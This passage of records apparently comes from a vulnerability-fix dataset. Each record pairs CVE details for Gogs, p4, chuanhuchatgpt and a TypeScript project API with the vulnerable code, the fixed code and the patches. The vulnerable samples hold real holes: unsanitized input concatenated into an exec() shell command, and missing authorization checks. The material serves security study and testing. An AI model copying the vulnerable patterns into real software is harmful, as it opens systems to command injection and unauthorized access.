"export async function verifyProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n from project \n where org_id = (select org_id from account where id = ${userId}) \n and id = ${projectId}\n )\n `\n return hasAccess\n}"}, {"id": "vul_js_142_3", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 71, "end_line": 104, "snippet": "projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n console.log(ctx.state)\n\n const hasProjectAccess = await verifyProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n\n if (!hasProjectAccess) {\n ctx.throw(401, \"Not allowed\")\n }\n\n if (user.role !== \"admin\") {\n ctx.throw(403, \"You must be an admin to delete a project\")\n }\n\n const [{ count }] =\n await sql`select count(*)::int from project where org_id = ${orgId}`\n\n if (count > 1) {\n await sql`delete from project where id = ${projectId}`\n ctx.status = 200\n ctx.body = {}\n return\n } else {\n ctx.status = 422\n\n ctx.body = {\n error: \"Deletion Failed\",\n message: \"An organization must have at least one project.\",\n }\n return\n }\n})"}], "fix_func": [{"id": "fix_js_142_1", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 105, "end_line": 127, "snippet": "projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { userId } = ctx.params\n\n const hasProjectAccess = await 
checkProjectAccess(projectId, userId)\n if (!hasProjectAccess) {\n ctx.throw(401, \"Unauthorized\")\n }\n\n const bodySchema = z.object({\n name: z.string(),\n })\n const { name } = bodySchema.parse(ctx.request.body)\n\n await sql`\n update project\n set\n name = ${name}\n where\n id = ${projectId}\n `\n ctx.status = 200\n})"}, {"id": "fix_js_142_2", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/utils/authorization.ts", "start_line": 3, "end_line": 13, "snippet": "export async function checkProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n from project \n where org_id = (select org_id from account where id = ${userId}) \n and id = ${projectId}\n )\n `\n return hasAccess\n}"}, {"id": "fix_js_142_3", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 71, "end_line": 103, "snippet": "projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n\n const hasProjectAccess = await checkProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n\n if (!hasProjectAccess) {\n ctx.throw(401, \"Not allowed\")\n }\n\n if (user.role !== \"admin\") {\n ctx.throw(403, \"You must be an admin to delete a project\")\n }\n\n const [{ count }] =\n await sql`select count(*)::int from project where org_id = ${orgId}`\n\n if (count > 1) {\n await sql`delete from project where id = ${projectId}`\n ctx.status = 200\n ctx.body = {}\n return\n } else {\n ctx.status = 422\n\n ctx.body = {\n error: \"Deletion Failed\",\n message: \"An organization must have at least one project.\",\n }\n return\n }\n})"}], "vul_patch": "--- a/packages/backend/src/api/v1/projects/index.ts\n+++ b/packages/backend/src/api/v1/projects/index.ts\n@@ -1,5 +1,12 @@\n projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n+ const { userId } = ctx.params\n+\n+ const hasProjectAccess = await checkProjectAccess(projectId, userId)\n+ if (!hasProjectAccess) {\n+ ctx.throw(401, \"Unauthorized\")\n+ }\n+\n const bodySchema = z.object({\n name: z.string(),\n })\n\n--- a/packages/backend/src/utils/authorization.ts\n+++ b/packages/backend/src/utils/authorization.ts\n@@ -1,4 +1,4 @@\n-export async function verifyProjectAccess(projectId: string, userId: string) {\n+export async function checkProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n\n--- a/packages/backend/src/api/v1/projects/index.ts\n+++ b/packages/backend/src/api/v1/projects/index.ts\n@@ -1,9 +1,8 @@\n projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n- console.log(ctx.state)\n \n- const hasProjectAccess = await verifyProjectAccess(projectId, userId)\n+ const hasProjectAccess = await checkProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n \n if (!hasProjectAccess) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-54148", "cve_description": "Gogs is an open source self-hosted Git service. A malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server. 
The vulnerability is fixed in 0.13.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/c94baec9ca923f38c19f0c7c5af722b9ec04022a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_206_1", "commit": "25a799a", "file_path": "internal/route/repo/editor.go", "start_line": 122, "end_line": 284, "snippet": "func editFilePost(c *context.Context, f form.EditRepoFile, isNewFile bool) {\n\tc.PageIs(\"Edit\")\n\tc.RequireHighlightJS()\n\tc.RequireSimpleMDE()\n\tc.Data[\"IsNewFile\"] = isNewFile\n\n\toldBranchName := c.Repo.BranchName\n\tbranchName := oldBranchName\n\toldTreePath := c.Repo.TreePath\n\tlastCommit := f.LastCommit\n\tf.LastCommit = c.Repo.Commit.ID.String()\n\n\tif f.IsNewBrnach() {\n\t\tbranchName = f.NewBranchName\n\t}\n\n\tf.TreePath = pathutil.Clean(f.TreePath)\n\ttreeNames, treePaths := getParentTreeFields(f.TreePath)\n\n\tc.Data[\"ParentTreePath\"] = path.Dir(c.Repo.TreePath)\n\tc.Data[\"TreePath\"] = f.TreePath\n\tc.Data[\"TreeNames\"] = treeNames\n\tc.Data[\"TreePaths\"] = treePaths\n\tc.Data[\"BranchLink\"] = c.Repo.RepoLink + \"/src/\" + branchName\n\tc.Data[\"FileContent\"] = f.Content\n\tc.Data[\"commit_summary\"] = f.CommitSummary\n\tc.Data[\"commit_message\"] = f.CommitMessage\n\tc.Data[\"commit_choice\"] = f.CommitChoice\n\tc.Data[\"new_branch_name\"] = branchName\n\tc.Data[\"last_commit\"] = f.LastCommit\n\tc.Data[\"MarkdownFileExts\"] = strings.Join(conf.Markdown.FileExtensions, \",\")\n\tc.Data[\"LineWrapExtensions\"] = strings.Join(conf.Repository.Editor.LineWrapExtensions, \",\")\n\tc.Data[\"PreviewableFileModes\"] = strings.Join(conf.Repository.Editor.PreviewableFileModes, \",\")\n\n\tif c.HasError() {\n\t\tc.Success(tmplEditorEdit)\n\t\treturn\n\t}\n\n\tif f.TreePath == \"\" {\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_cannot_be_empty\"), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif oldBranchName != branchName {\n\t\tif _, err := c.Repo.Repository.GetBranch(branchName); err == nil {\n\t\t\tc.FormErr(\"NewBranchName\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.branch_already_exists\", branchName), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tvar newTreePath string\n\tfor index, part := range treeNames {\n\t\tnewTreePath = path.Join(newTreePath, part)\n\t\tentry, err := c.Repo.Commit.TreeEntry(newTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\t// Means there is no item with that name, so we're good\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tc.Error(err, \"get tree entry\")\n\t\t\treturn\n\t\t}\n\t\tif index != len(treeNames)-1 {\n\t\t\tif !entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.directory_is_a_file\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tif entry.IsSymlink() 
{\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t} else if entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_is_a_directory\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\tif !isNewFile {\n\t\t_, err := c.Repo.Commit.TreeEntry(oldTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_editing_no_longer_exists\", oldTreePath), tmplEditorEdit, &f)\n\t\t\t} else {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tif lastCommit != c.Repo.CommitID {\n\t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n\t\t\tif err != nil {\n\t\t\t\tc.Error(err, \"get changed files\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tfor _, file := range files {\n\t\t\t\tif file == f.TreePath {\n\t\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_changed_while_editing\", c.Repo.RepoLink+\"/compare/\"+lastCommit+\"...\"+c.Repo.CommitID), tmplEditorEdit, &f)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif oldTreePath != f.TreePath {\n\t\t// We have a new filename (rename or completely new file) so we need to make sure it doesn't already exist, can't clobber.\n\t\tentry, err := c.Repo.Commit.TreeEntry(f.TreePath)\n\t\tif err != nil {\n\t\t\tif !gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif entry != nil {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_already_exists\", f.TreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tmessage := strings.TrimSpace(f.CommitSummary)\n\tif message == \"\" {\n\t\tif isNewFile {\n\t\t\tmessage = c.Tr(\"repo.editor.add\", f.TreePath)\n\t\t} else {\n\t\t\tmessage = c.Tr(\"repo.editor.update\", f.TreePath)\n\t\t}\n\t}\n\n\tf.CommitMessage = strings.TrimSpace(f.CommitMessage)\n\tif len(f.CommitMessage) > 0 {\n\t\tmessage += \"\\n\\n\" + f.CommitMessage\n\t}\n\n\tif err := c.Repo.Repository.UpdateRepoFile(c.User, database.UpdateRepoFileOptions{\n\t\tOldBranch: oldBranchName,\n\t\tNewBranch: branchName,\n\t\tOldTreeName: oldTreePath,\n\t\tNewTreeName: f.TreePath,\n\t\tMessage: message,\n\t\tContent: strings.ReplaceAll(f.Content, \"\\r\", \"\"),\n\t\tIsNewFile: isNewFile,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to update repo file: %v\", err)\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.fail_to_update_file\", f.TreePath, errors.InternalServerError), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif f.IsNewBrnach() && c.Repo.PullRequest.Allowed {\n\t\tc.Redirect(c.Repo.PullRequestURL(oldBranchName, f.NewBranchName))\n\t} else {\n\t\tc.Redirect(c.Repo.RepoLink + \"/src/\" + branchName + \"/\" + f.TreePath)\n\t}\n}"}], "fix_func": [{"id": "fix_go_206_1", "commit": "c94baec9ca923f38c19f0c7c5af722b9ec04022a", "file_path": "internal/route/repo/editor.go", "start_line": 122, "end_line": 293, "snippet": "func editFilePost(c *context.Context, f form.EditRepoFile, isNewFile bool) {\n\tc.PageIs(\"Edit\")\n\tc.RequireHighlightJS()\n\tc.RequireSimpleMDE()\n\tc.Data[\"IsNewFile\"] = isNewFile\n\n\toldBranchName := c.Repo.BranchName\n\tbranchName := oldBranchName\n\toldTreePath := c.Repo.TreePath\n\tlastCommit := f.LastCommit\n\tf.LastCommit = c.Repo.Commit.ID.String()\n\n\tif f.IsNewBrnach() {\n\t\tbranchName = f.NewBranchName\n\t}\n\n\tf.TreePath = 
pathutil.Clean(f.TreePath)\n\ttreeNames, treePaths := getParentTreeFields(f.TreePath)\n\n\tc.Data[\"ParentTreePath\"] = path.Dir(c.Repo.TreePath)\n\tc.Data[\"TreePath\"] = f.TreePath\n\tc.Data[\"TreeNames\"] = treeNames\n\tc.Data[\"TreePaths\"] = treePaths\n\tc.Data[\"BranchLink\"] = c.Repo.RepoLink + \"/src/\" + branchName\n\tc.Data[\"FileContent\"] = f.Content\n\tc.Data[\"commit_summary\"] = f.CommitSummary\n\tc.Data[\"commit_message\"] = f.CommitMessage\n\tc.Data[\"commit_choice\"] = f.CommitChoice\n\tc.Data[\"new_branch_name\"] = branchName\n\tc.Data[\"last_commit\"] = f.LastCommit\n\tc.Data[\"MarkdownFileExts\"] = strings.Join(conf.Markdown.FileExtensions, \",\")\n\tc.Data[\"LineWrapExtensions\"] = strings.Join(conf.Repository.Editor.LineWrapExtensions, \",\")\n\tc.Data[\"PreviewableFileModes\"] = strings.Join(conf.Repository.Editor.PreviewableFileModes, \",\")\n\n\tif c.HasError() {\n\t\tc.Success(tmplEditorEdit)\n\t\treturn\n\t}\n\n\tif f.TreePath == \"\" {\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_cannot_be_empty\"), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif oldBranchName != branchName {\n\t\tif _, err := c.Repo.Repository.GetBranch(branchName); err == nil {\n\t\t\tc.FormErr(\"NewBranchName\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.branch_already_exists\", branchName), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tvar newTreePath string\n\tfor index, part := range treeNames {\n\t\tnewTreePath = path.Join(newTreePath, part)\n\t\tentry, err := c.Repo.Commit.TreeEntry(newTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\t// Means there is no item with that name, so we're good\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tc.Error(err, \"get tree entry\")\n\t\t\treturn\n\t\t}\n\t\tif index != len(treeNames)-1 {\n\t\t\tif !entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.directory_is_a_file\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the target file is a symlink.\n\t\t\tif entry.IsSymlink() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t} else if entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_is_a_directory\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\tif !isNewFile {\n\t\tentry, err := c.Repo.Commit.TreeEntry(oldTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_editing_no_longer_exists\", oldTreePath), tmplEditorEdit, &f)\n\t\t\t} else {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t}\n\t\t\treturn\n\t\t}\n\n\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the old file is a symlink.\n\t\tif entry.IsSymlink() {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", oldTreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\n\t\tif lastCommit != c.Repo.CommitID {\n\t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n\t\t\tif err != nil {\n\t\t\t\tc.Error(err, \"get changed files\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tfor _, file := range files {\n\t\t\t\tif file == f.TreePath {\n\t\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_changed_while_editing\", c.Repo.RepoLink+\"/compare/\"+lastCommit+\"...\"+c.Repo.CommitID), tmplEditorEdit, 
&f)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif oldTreePath != f.TreePath {\n\t\t// We have a new filename (rename or completely new file) so we need to make sure it doesn't already exist, can't clobber.\n\t\tentry, err := c.Repo.Commit.TreeEntry(f.TreePath)\n\t\tif err != nil {\n\t\t\tif !gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif entry != nil {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_already_exists\", f.TreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tmessage := strings.TrimSpace(f.CommitSummary)\n\tif message == \"\" {\n\t\tif isNewFile {\n\t\t\tmessage = c.Tr(\"repo.editor.add\", f.TreePath)\n\t\t} else {\n\t\t\tmessage = c.Tr(\"repo.editor.update\", f.TreePath)\n\t\t}\n\t}\n\n\tf.CommitMessage = strings.TrimSpace(f.CommitMessage)\n\tif len(f.CommitMessage) > 0 {\n\t\tmessage += \"\\n\\n\" + f.CommitMessage\n\t}\n\n\tif err := c.Repo.Repository.UpdateRepoFile(c.User, database.UpdateRepoFileOptions{\n\t\tOldBranch: oldBranchName,\n\t\tNewBranch: branchName,\n\t\tOldTreeName: oldTreePath,\n\t\tNewTreeName: f.TreePath,\n\t\tMessage: message,\n\t\tContent: strings.ReplaceAll(f.Content, \"\\r\", \"\"),\n\t\tIsNewFile: isNewFile,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to update repo file: %v\", err)\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.fail_to_update_file\", f.TreePath, errors.InternalServerError), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif f.IsNewBrnach() && c.Repo.PullRequest.Allowed {\n\t\tc.Redirect(c.Repo.PullRequestURL(oldBranchName, f.NewBranchName))\n\t} else {\n\t\tc.Redirect(c.Repo.RepoLink + \"/src/\" + branchName + \"/\" + f.TreePath)\n\t}\n}"}], "vul_patch": "--- a/internal/route/repo/editor.go\n+++ b/internal/route/repo/editor.go\n@@ -71,6 +71,7 @@\n \t\t\t\treturn\n \t\t\t}\n \t\t} else {\n+\t\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the target file is a symlink.\n \t\t\tif entry.IsSymlink() {\n \t\t\t\tc.FormErr(\"TreePath\")\n \t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n@@ -84,7 +85,7 @@\n \t}\n \n \tif !isNewFile {\n-\t\t_, err := c.Repo.Commit.TreeEntry(oldTreePath)\n+\t\tentry, err := c.Repo.Commit.TreeEntry(oldTreePath)\n \t\tif err != nil {\n \t\t\tif gitutil.IsErrRevisionNotExist(err) {\n \t\t\t\tc.FormErr(\"TreePath\")\n@@ -94,6 +95,14 @@\n \t\t\t}\n \t\t\treturn\n \t\t}\n+\n+\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the old file is a symlink.\n+\t\tif entry.IsSymlink() {\n+\t\t\tc.FormErr(\"TreePath\")\n+\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", oldTreePath), tmplEditorEdit, &f)\n+\t\t\treturn\n+\t\t}\n+\n \t\tif lastCommit != c.Repo.CommitID {\n \t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n \t\t\tif err != nil {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-25171", "cve_description": "The package p4 before 0.0.7 are vulnerable to Command Injection via the run() function due to improper input sanitization", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command 
('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/natelong/p4", "patch_url": ["https://github.com/natelong/p4/commit/ae42e251beabf67c00539ec0e1d7aa149ca445fb"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_118_1", "commit": "d37c2b9", "file_path": "p4.js", "start_line": 6, "end_line": 18, "snippet": "function runCommand(command, args, done) {\n if(typeof args === \"function\") {\n done = args;\n args = \"\";\n }\n\n exec(\"p4 \" + command + \" \" + (args || \"\"), function(err, stdOut, stdErr) {\n if(err) return done(err);\n if(stdErr) return done(new Error(stdErr));\n\n done(null, stdOut);\n });\n}"}], "fix_func": [{"id": "fix_js_118_1", "commit": "ae42e25", "file_path": "p4.js", "start_line": 6, "end_line": 34, "snippet": "function runCommand(command, args, done) {\n if(typeof args === \"function\") {\n done = args;\n args = \"\";\n }\n\n if(!Array.isArray(args)) {\n args = [args];\n }\n args.unshift(command);\n\n var child = spawn(\"p4\", args);\n var stdOutBuf = \"\";\n var stdErrBuf = \"\";\n\n child.stdout.on(\"data\", (data) => stdOutBuf += data);\n child.stderr.on(\"data\", (data) => stdErrBuf += data)\n child.on(\"exit\", (code) => {\n if (code !== 0) {\n return done(new Error(`p4 subcommand exited with return code ${code}`));\n }\n\n if (stdErrBuf.length > 0) {\n return done(new Error(stdErrBuf));\n }\n\n done(null, stdOutBuf);\n });\n}"}], "vul_patch": "--- a/p4.js\n+++ b/p4.js\n@@ -4,10 +4,26 @@\n args = \"\";\n }\n \n- exec(\"p4 \" + command + \" \" + (args || \"\"), function(err, stdOut, stdErr) {\n- if(err) return done(err);\n- if(stdErr) return done(new Error(stdErr));\n+ if(!Array.isArray(args)) {\n+ args = [args];\n+ }\n+ args.unshift(command);\n \n- done(null, stdOut);\n+ var child = spawn(\"p4\", args);\n+ var stdOutBuf = \"\";\n+ var stdErrBuf = \"\";\n+\n+ child.stdout.on(\"data\", (data) => stdOutBuf += data);\n+ child.stderr.on(\"data\", (data) => stdErrBuf += data)\n+ child.on(\"exit\", (code) => {\n+ if (code !== 0) {\n+ return done(new Error(`p4 subcommand exited with return code ${code}`));\n+ }\n+\n+ if (stdErrBuf.length > 0) {\n+ return done(new Error(stdErrBuf));\n+ }\n+\n+ done(null, stdOutBuf);\n });\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-5823", "cve_description": "A file overwrite vulnerability exists in gaizhenbiao/chuanhuchatgpt versions <= 20240410. This vulnerability allows an attacker to gain unauthorized access to overwrite critical configuration files within the system. Exploiting this vulnerability can lead to unauthorized changes in system behavior or security settings. 
Additionally, tampering with these configuration files can result in a denial of service (DoS) condition, disrupting normal system operation.", "cwe_info": {"CWE-610": {"name": "Externally Controlled Reference to a Resource in Another Sphere", "description": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere."}}, "repo": "https://github.com/gaizhenbiao/chuanhuchatgpt", "patch_url": ["https://github.com/gaizhenbiao/chuanhuchatgpt/commit/720c23d755a4a955dcb0a54e8c200a2247a27f8b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_56_1", "commit": "ffea5e9", "file_path": "modules/utils.py", "start_line": 744, "end_line": 760, "snippet": "def update_chuanhu():\n from .repo import background_update\n\n print(\"[Updater] Trying to update...\")\n update_status = background_update()\n if update_status == \"success\":\n logging.info(\"Successfully updated, restart needed\")\n status = 'success'\n return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n else:\n status = 'failure'\n return gr.Markdown(\n value=i18n(\n \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n )\n + status\n )"}], "fix_func": [{"id": "fix_py_56_1", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "ChuanhuChatbot.py", "start_line": 784, "end_line": 784, "snippet": " [user_name],"}, {"id": "fix_py_56_2", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "modules/utils.py", "start_line": 744, "end_line": 762, "snippet": "def update_chuanhu(username):\n if username not in admin_list:\n return gr.Markdown(value=i18n(\"no_permission_to_update_description\"))\n from .repo import background_update\n\n print(\"[Updater] Trying to update...\")\n update_status = background_update()\n if update_status == \"success\":\n logging.info(\"Successfully updated, restart needed\")\n status = 'success'\n return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n else:\n status = 'failure'\n return gr.Markdown(\n value=i18n(\n \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n )\n + status\n )"}, {"id": "fix_py_56_3", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "modules/utils.py", "start_line": 30, "end_line": 30, "snippet": "from modules.config import retrieve_proxy, hide_history_when_not_logged_in, admin_list"}], "vul_patch": "--- a/modules/utils.py\n+++ b/ChuanhuChatbot.py\n@@ -1,17 +1 @@\n-def update_chuanhu():\n- from .repo import background_update\n-\n- print(\"[Updater] Trying to update...\")\n- update_status = background_update()\n- if update_status == \"success\":\n- logging.info(\"Successfully updated, restart needed\")\n- status = 'success'\n- return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n- else:\n- status = 'failure'\n- return gr.Markdown(\n- value=i18n(\n- \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n- )\n- + status\n- )\n+ 
[user_name],\n\n--- /dev/null\n+++ b/ChuanhuChatbot.py\n@@ -0,0 +1,19 @@\n+def update_chuanhu(username):\n+ if username not in admin_list:\n+ return gr.Markdown(value=i18n(\"no_permission_to_update_description\"))\n+ from .repo import background_update\n+\n+ print(\"[Updater] Trying to update...\")\n+ update_status = background_update()\n+ if update_status == \"success\":\n+ logging.info(\"Successfully updated, restart needed\")\n+ status = 'success'\n+ return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n+ else:\n+ status = 'failure'\n+ return gr.Markdown(\n+ value=i18n(\n+ \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n+ )\n+ + status\n+ )\n\n--- /dev/null\n+++ b/ChuanhuChatbot.py\n@@ -0,0 +1 @@\n+from modules.config import retrieve_proxy, hide_history_when_not_logged_in, admin_list\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-5823:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/chuanhuchatgpt\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2024-5823/bin/python hand_test.py\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-46959", "cve_description": "An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the 